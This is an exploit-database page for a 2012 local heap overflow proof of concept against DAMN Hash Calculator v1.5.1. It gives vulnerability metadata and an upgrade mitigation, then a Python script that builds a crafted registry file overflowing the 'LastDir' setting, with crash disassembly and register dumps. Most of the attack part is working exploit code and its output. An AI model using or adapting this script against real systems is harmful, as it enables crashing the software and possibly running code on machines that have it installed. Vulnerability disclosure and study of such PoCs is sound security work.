DAMN Hash Calculator v1.5.1 Local Heap Overflow PoC

vendor:

DAMN Hash Calculator

by:

Julien Ahrens

7,8

CVSS

HIGH

Heap Overflow

119

CWE

Product Name: DAMN Hash Calculator

Affected Version From: 1.5.1

Affected Version To: 1.5.1

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 Professional German

2012

DAMN Hash Calculator v1.5.1 Local Heap Overflow PoC

A local heap overflow vulnerability exists in DAMN Hash Calculator v1.5.1. An attacker can exploit this vulnerability by importing a specially crafted registry file which contains a malicious string of characters. This will cause a buffer overflow and allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of DAMN Hash Calculator.

Source

Exploit-DB raw data:

#!/usr/bin/python
 
# Exploit Title: DAMN Hash Calculator v1.5.1 Local Heap Overflow PoC
# Version:       1.5.1
# Date:          2012-02-21
# Author:        Julien Ahrens
# Homepage:      http://www.inshell.net
# Software Link: http://www.google.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         Old but nice software...just to proof it's there :-)
# Howto:         Import Reg -> Start App -> Select File -> Cancel without choosing one

#7C9204E6   . 8B7D 08        MOV EDI,DWORD PTR SS:[EBP+8]
#7C9204E9   . 0B47 10        OR EAX,DWORD PTR DS:[EDI+10]
#7C9204EC   . A9 00000269    TEST EAX,69020000
#7C9204F1   . 0F85 8BA70300  JNZ ntdll.7C95AC82
#7C9204F7   > 8B45 10        MOV EAX,DWORD PTR SS:[EBP+10]
#7C9204FA   . 8A48 FD        MOV CL,BYTE PTR DS:[EAX-3]      <-- Crash
#7C9204FD   . 83C0 F8        ADD EAX,-8
#7C920500   . F6C1 01        TEST CL,1
#7C920503   . 56             PUSH ESI
#7C920504   . 0F84 92A70300  JE ntdll.7C95AC9C
#7C92050A   . F6C1 08        TEST CL,8
#7C92050D   . 0F85 B3A70300  JNZ ntdll.7C95ACC6

#EAX 42424245
#ECX 00000008
#EDX 77C31AE8 msvcrt.77C31AE8
#EBX 0040F2F0 DAMN_Has.0040F2F0
#ESP 0012F54C
#EBP 0012F550
#ESI 0041A2DC ASCII "EBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
#EDI 00330000
#EIP 7C9204FA ntdll.7C9204FA


file="poc.reg"

junk1="\x41" * 392
boom="\x45\x42\x42\x42"
junk2="\x43" * 50

poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\DAMN\Hash Calculator\Settings]\n"
poc=poc + "\"LastDir\"=\"" + junk1 + boom + junk2 + "\""

try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";